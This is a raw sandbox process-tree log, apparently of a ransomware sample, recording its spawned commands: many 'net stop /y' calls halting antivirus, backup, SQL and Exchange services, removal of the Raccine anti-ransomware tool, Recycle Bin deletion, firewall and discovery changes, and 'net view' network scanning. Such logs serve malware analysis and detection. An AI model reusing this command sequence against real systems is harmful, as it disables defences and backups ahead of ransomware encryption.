C:\Windows\SysWOW64\net.exe"net.exe" stop EsgShKernel /y2⤵PID:5300
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SYSTEM_BGC /y2⤵PID:5288
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mozyprobackup /y2⤵PID:5280
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ekrn /y2⤵PID:5272
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamNFSSvc /y2⤵PID:5224
-
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start upnphost /y1⤵PID:4940
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop avpsus /y1⤵PID:5052
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop YooBackup /y1⤵PID:4460
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop stc_raw_agent /y1⤵PID:4300
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DefWatch /y1⤵PID:10036
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y1⤵PID:11460
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y1⤵PID:12000
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop PDVFSService /y1⤵PID:12484
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McTaskManager /y1⤵PID:13080
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$PROD /y1⤵PID:13056
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y1⤵PID:5064
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Safestore Service” /y1⤵PID:13736
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ntrtscan /y1⤵PID:14404
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y1⤵PID:5136
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CAARCUpdateSvc /y1⤵PID:15848
-
C:\Windows\SysWOW64\net.exenet view1⤵
- Discovers systems in the same network
PID:16288
-
C:\Windows\PSEXESVC.exeC:\Windows\PSEXESVC.exe1⤵PID:16352
-
C:\Windows\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"2⤵PID:12860
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM RaccineSettings.exe3⤵PID:13540
-
-
C:\Windows\system32\reg.exe"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F3⤵PID:12908
-
-
C:\Windows\system32\reg.exe"reg" delete HKCU\Software\Raccine /F3⤵
- Modifies registry key
PID:13512
-
-
C:\Windows\system32\schtasks.exe"schtasks" /DELETE /TN "Raccine Rules Updater" /F3⤵PID:14756
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin3⤵PID:14912
-
-
C:\Windows\system32\sc.exe"sc.exe" config FDResPub start= auto3⤵PID:10668
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLTELEMETRY start= disabled3⤵PID:5472
-
-
C:\Windows\system32\sc.exe"sc.exe" config SSDPSRV start= auto3⤵PID:6264
-
-
C:\Windows\system32\sc.exe"sc.exe" config SstpSvc start= disabled3⤵PID:7564
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c rd /s /q D:\\$Recycle.bin3⤵PID:6992
-
-
C:\Windows\system32\sc.exe"sc.exe" config upnphost start= auto3⤵PID:5852
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLWriter start= disabled3⤵PID:5712
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled3⤵PID:5792
-
-
C:\Windows\system32\net.exe"net.exe" stop bedbg /y3⤵PID:4760
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop bedbg /y4⤵PID:14868
-
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes3⤵PID:12652
-
-
C:\Windows\system32\net.exe"net.exe" start FDResPub /y3⤵PID:11844
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start FDResPub /y4⤵PID:7544
-
-
-
C:\Windows\system32\net.exe"net.exe" start Dnscache /y3⤵PID:7700
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start Dnscache /y4⤵PID:4524
-
-
-
C:\Windows\system32\sc.exe"sc.exe" config Dnscache start= auto3⤵PID:15084
-
-
C:\Windows\system32\net.exe"net.exe" stop avpsus /y3⤵PID:6924
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop avpsus /y4⤵PID:15036
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$SQL_2008 /y3⤵PID:14436
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SQL_2008 /y4⤵PID:14524
-
-
-
C:\Windows\system32\net.exe"net.exe" start SSDPSRV /y3⤵PID:7520
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start SSDPSRV /y4⤵PID:7548
-
-
-
C:\Windows\system32\net.exe"net.exe" start upnphost /y3⤵PID:14852
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start upnphost /y4⤵PID:14832
-
-
-
C:\Windows\system32\net.exe"net.exe" stop EhttpSrv /y3⤵PID:14000
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EhttpSrv /y4⤵PID:7040
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$SYSTEM_BGC /y3⤵PID:8252
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y4⤵PID:6256
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ccEvtMgr /y3⤵PID:11812
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccEvtMgr /y4⤵PID:5892
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BMR Boot Service /y3⤵PID:12812
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y4⤵PID:12676
-
-
-
C:\Windows\system32\net.exe"net.exe" stop NetBackup BMR MTFTP Service /y3⤵PID:12864
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y4⤵PID:10216
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ekrn /y3⤵PID:15076
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ekrn /y4⤵PID:6640
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ccSetMgr /y3⤵PID:15028
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccSetMgr /y4⤵PID:8096
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$VEEAMSQL2008R2 /y3⤵PID:6288
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y4⤵PID:15376
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SavRoam /y3⤵PID:13028
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SavRoam /y4⤵PID:15492
-
-
-
C:\Windows\system32\net.exe"net.exe" stop DefWatch /y3⤵PID:13056
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop DefWatch /y4⤵PID:15552
-
-
-
C:\Windows\system32\net.exe"net.exe" stop mozyprobackup /y3⤵PID:11132
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mozyprobackup /y4⤵PID:14096
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$TPS /y3⤵PID:12264
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$TPS /y4⤵PID:15840
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VSNAPVSS /y3⤵PID:10656
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VSNAPVSS /y4⤵PID:6972
-
-
-
C:\Windows\system32\net.exe"net.exe" stop QBFCService /y3⤵PID:15520
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBFCService /y4⤵PID:6196
-
-
-
C:\Windows\system32\net.exe"net.exe" stop RTVscan /y3⤵PID:12988
-
-
C:\Windows\system32\net.exe"net.exe" stop EPUpdateService /y3⤵PID:6516
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EPUpdateService /y4⤵PID:13000
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamTransportSvc /y3⤵PID:13048
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y4⤵PID:15464
-
-
-
C:\Windows\system32\net.exe"net.exe" stop QBIDPService /y3⤵PID:12992
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBIDPService /y4⤵PID:15532
-
-
-
C:\Windows\system32\net.exe"net.exe" stop EsgShKernel /y3⤵PID:9596
-
-
C:\Windows\system32\net.exe"net.exe" stop EPSecurityService /y3⤵PID:14824
-
-
C:\Windows\system32\net.exe"net.exe" stop ntrtscan /y3⤵PID:15536
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ntrtscan /y4⤵PID:15484
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$SQLEXPRESS /y3⤵PID:6148
-
-
C:\Windows\system32\net.exe"net.exe" stop MMS /y3⤵PID:12980
-
-
C:\Windows\system32\net.exe"net.exe" stop Intuit.QuickBooks.FCS /y3⤵PID:14212
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y4⤵PID:7792
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamDeploymentService /y3⤵PID:15904
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y4⤵PID:6012
-
-
-
C:\Windows\system32\net.exe"net.exe" stop PDVFSService /y3⤵PID:15500
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop PDVFSService /y4⤵PID:6248
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$TPSAMA /y3⤵PID:8412
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$TPSAMA /y4⤵PID:15100
-
-
-
C:\Windows\system32\net.exe"net.exe" stop QBCFMonitorService /y3⤵PID:7656
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBCFMonitorService /y4⤵PID:9848
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamNFSSvc /y3⤵PID:15272
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y4⤵PID:9864
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$VEEAMSQL2008R2 /y3⤵PID:14208
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y4⤵PID:7496
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y3⤵PID:11932
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y4⤵PID:16180
-
-
-
C:\Windows\system32\net.exe"net.exe" stop YooBackup /y3⤵PID:16196
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooBackup /y4⤵PID:7296
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ESHASRV /y3⤵PID:12208
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ESHASRV /y4⤵PID:11804
-
-
-
C:\Windows\system32\net.exe"net.exe" stop veeam /y3⤵PID:4676
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop veeam /y4⤵PID:12372
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SDRSVC /y3⤵PID:11872
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:6688
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SDRSVC /y4⤵PID:4696
-
-
-
C:\Windows\system32\net.exe"net.exe" stop YooIT /y3⤵PID:8056
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooIT /y4⤵PID:7588
-
-
-
C:\Windows\system32\net.exe"net.exe" stop KAVFS /y3⤵PID:6580
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop KAVFS /y4⤵PID:16012
-
-
-
C:\Windows\system32\net.exe"net.exe" stop PDVFSService /y3⤵PID:8812
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:6268
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop PDVFSService /y4⤵PID:6996
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLWriter /y3⤵PID:15860
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLWriter /y4⤵PID:4532
-
-
-
C:\Windows\system32\net.exe"net.exe" stop zhudongfangyu /y3⤵PID:12224
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop zhudongfangyu /y4⤵PID:14728
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$VEEAMSQL2012 /y3⤵PID:15700
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecAgentAccelerator /y3⤵PID:15760
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y4⤵PID:15620
-
-
-
C:\Windows\system32\net.exe"net.exe" stop stc_raw_agent /y3⤵PID:14284
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$SBSMONITORING /y3⤵PID:15508
-
-
C:\Windows\system32\net.exe"net.exe" stop KAVFSGT /y3⤵PID:15288
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop KAVFSGT /y4⤵PID:13364
-
-
-
C:\Windows\system32\net.exe"net.exe" stop FA_Scheduler /y3⤵PID:11900
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop FA_Scheduler /y4⤵PID:14308
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecAgentBrowser /y3⤵PID:13308
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y4⤵PID:16116
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Enterprise Client Service” /y3⤵PID:16136
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Enterprise Client Service” /y4⤵PID:8648
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y3⤵PID:14276
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y4⤵PID:7272
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “SQL Backups /y3⤵PID:13348
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “SQL Backups /y4⤵PID:8052
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecDiveciMediaService /y3⤵PID:6432
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecDiveciMediaService /y4⤵PID:11856
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamBrokerSvc /y3⤵PID:12668
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamBrokerSvc /y4⤵PID:14712
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MsDtsServer100 /y3⤵PID:7248
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer100 /y4⤵PID:15660
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$SHAREPOINT /y3⤵PID:16224
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y4⤵PID:16024
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecJobEngine /y3⤵PID:12340
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y4⤵PID:15304
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$SQL_2008 /y3⤵PID:8128
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y4⤵PID:16096
-
-
-
C:\Windows\system32\net.exe"net.exe" stop NetMsmqActivator /y3⤵PID:4972
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetMsmqActivator /y4⤵PID:15928
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecManagementService /y3⤵PID:15920
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y4⤵PID:14720
-
-
-
C:\Windows\system32\net.exe"net.exe" stop kavfsslp /y3⤵PID:6716
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop kavfsslp /y4⤵PID:15672
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSExchangeIS /y3⤵PID:8796
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeIS /y4⤵PID:7480
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecRPCService /y3⤵PID:8712
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y4⤵PID:11848
-
-
-
C:\Windows\system32\net.exe"net.exe" stop klnagent /y3⤵PID:11956
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop klnagent /y4⤵PID:6660
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLServerADHelper /y3⤵PID:8152
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper /y4⤵PID:14240
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos AutoUpdate Service” /y3⤵PID:11952
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y4⤵PID:5948
-
-
-
C:\Windows\system32\net.exe"net.exe" stop AcrSch2Svc /y3⤵PID:5916
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y4⤵PID:9616
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamCatalogSvc /y3⤵PID:14264
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamCatalogSvc /y4⤵PID:9572
-
-
-
C:\Windows\system32\net.exe"net.exe" stop McAfeeEngineService /y3⤵PID:8388
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeEngineService /y4⤵PID:10856
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ReportServer /y3⤵PID:5672
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer /y4⤵PID:6888
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y3⤵PID:14272
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y4⤵PID:8836
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SamSs /y3⤵PID:6020
-
-
C:\Windows\system32\net.exe"net.exe" stop AcronisAgent /y3⤵PID:5264
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y4⤵PID:2824
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamHvIntegrationSvc /y3⤵PID:9600
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y4⤵PID:13384
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamBackupSvc /y3⤵PID:8516
-
-
C:\Windows\system32\net.exe"net.exe" stop “SQLsafe Backup Service” /y3⤵PID:7000
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “SQLsafe Backup Service” /y4⤵PID:6132
-
-
-
C:\Windows\system32\net.exe"net.exe" stop macmnsvc /y3⤵PID:9200
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:6604
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop macmnsvc /y4⤵PID:14952
-
-
-
C:\Windows\system32\net.exe"net.exe" stop CAARCUpdateSvc /y3⤵PID:4464
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CAARCUpdateSvc /y4⤵PID:15316
-
-
-
C:\Windows\system32\net.exe"net.exe" stop POP3Svc /y3⤵PID:15276
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop POP3Svc /y4⤵PID:8352
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamCloudSvc /y3⤵PID:8724
-
-
C:\Windows\system32\net.exe"net.exe" stop McAfeeFramework /y3⤵PID:8816
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeFramework /y4⤵PID:8552
-
-
-
C:\Windows\system32\net.exe"net.exe" stop sophos /y3⤵PID:8832
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sophos /y4⤵PID:9548
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSExchangeMGMT /y3⤵PID:8172
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeMGMT /y4⤵PID:5896
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$TPS /y3⤵PID:10788
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y4⤵PID:8824
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos Clean Service” /y3⤵PID:9188
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Clean Service” /y4⤵PID:6696
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:6832
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Acronis VSS Provider” /y3⤵PID:5868
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Acronis VSS Provider” /y4⤵PID:7736
-
-
-
C:\Windows\system32\net.exe"net.exe" stop masvc /y3⤵PID:9928
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop masvc /y4⤵PID:6176
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MsDtsServer /y3⤵PID:13672
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer /y4⤵PID:7472
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamDeploymentService /y3⤵PID:9104
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y4⤵PID:6284
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLServerOLAPService /y3⤵PID:5036
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerOLAPService /y4⤵PID:13468
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ReportServer$SQL_2008 /y3⤵PID:13388
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$SQL_2008 /y4⤵PID:6300
-
-
-
C:\Windows\system32\net.exe"net.exe" stop McAfeeFrameworkMcAfeeFramework /y3⤵PID:13420
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y4⤵PID:8764
-
-
-
C:\Windows\system32\net.exe"net.exe" stop IISAdmin /y3⤵PID:7440
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop IISAdmin /y4⤵PID:14364
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLFDLauncher$TPSAMA /y3⤵PID:9004
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y4⤵PID:13684
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MBAMService /y3⤵PID:13668
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MBAMService /y4⤵PID:8652
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamNFSSvc /y3⤵PID:13568
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos Agent” /y3⤵PID:10088
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Agent” /y4⤵PID:8936
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MySQL57 /y3⤵PID:8556
-
-
C:\Windows\system32\net.exe"net.exe" stop McShield /y3⤵PID:11000
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McShield /y4⤵PID:10568
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SstpSvc /y3⤵PID:9712
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SstpSvc /y4⤵PID:8032
-
-
-
C:\Windows\system32\net.exe"net.exe" stop EraserSvc11710 /y3⤵PID:10904
-
-
C:\Windows\system32\net.exe"net.exe" stop MSExchangeMTA /y3⤵PID:11400
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeMTA /y4⤵PID:14348
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamRESTSvc /y3⤵PID:4856
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamRESTSvc /y4⤵PID:13580
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ReportServer$TPSAMA /y3⤵PID:7208
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$TPSAMA /y4⤵PID:11408
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MySQL80 /y3⤵PID:10964
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MySQL80 /y4⤵PID:7340
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLSERVER /y3⤵PID:9196
-
-
C:\Windows\system32\net.exe"net.exe" stop MBEndpointAgent /y3⤵PID:7264
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MBEndpointAgent /y4⤵PID:9496
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Zoolz 2 Service” /y3⤵PID:8240
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Zoolz 2 Service” /y4⤵PID:8188
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos Device Control Service” /y3⤵PID:11608
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Device Control Service” /y4⤵PID:14036
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamEnterpriseManagerSvc /y3⤵PID:4712
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y4⤵PID:10956
-
-
-
C:\Windows\system32\net.exe"net.exe" stop McTaskManager /y3⤵PID:5056
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McTaskManager /y4⤵PID:11220
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ReportServer$SYSTEM_BGC /y3⤵PID:9500
-
-
C:\Windows\system32\net.exe"net.exe" stop MSOLAP$TPS /y3⤵PID:8244
-
-
C:\Windows\system32\net.exe"net.exe" stop “Symantec System Recovery” /y3⤵PID:5600
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:6100
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Symantec System Recovery” /y4⤵PID:12032
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “aphidmonitorservice” /y3⤵PID:9152
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “aphidmonitorservice” /y4⤵PID:6532
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamTransportSvc /y3⤵PID:8248
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y4⤵PID:9884
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSOLAP$SQL_2008 /y3⤵PID:12540
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y4⤵PID:5684
-
-
-
C:\Windows\system32\net.exe"net.exe" stop mfefire /y3⤵PID:11028
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfefire /y4⤵PID:11440
-
-
-
C:\Windows\system32\net.exe"net.exe" stop OracleClientCache80 /y3⤵PID:5812
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop OracleClientCache80 /y4⤵PID:5748
-
-
-
C:\Windows\system32\net.exe"net.exe" stop msexchangeadtopology /y3⤵PID:9412
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop msexchangeadtopology /y4⤵PID:4568
-
-
-
C:\Windows\system32\net.exe"net.exe" stop wbengine /y3⤵PID:8200
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop wbengine /y4⤵PID:10252
-
-
-
C:\Windows\system32\net.exe"net.exe" stop UI0Detect /y3⤵PID:4716
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:8392
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop UI0Detect /y4⤵PID:6384
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ReportServer$SQL_2008 /y3⤵PID:15848
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$SQL_2008 /y4⤵PID:11656
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSExchangeSA /y3⤵PID:6116
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeSA /y4⤵PID:8924
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$PRACTTICEBGC /y3⤵PID:10740
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y4⤵PID:10076
-
-
-
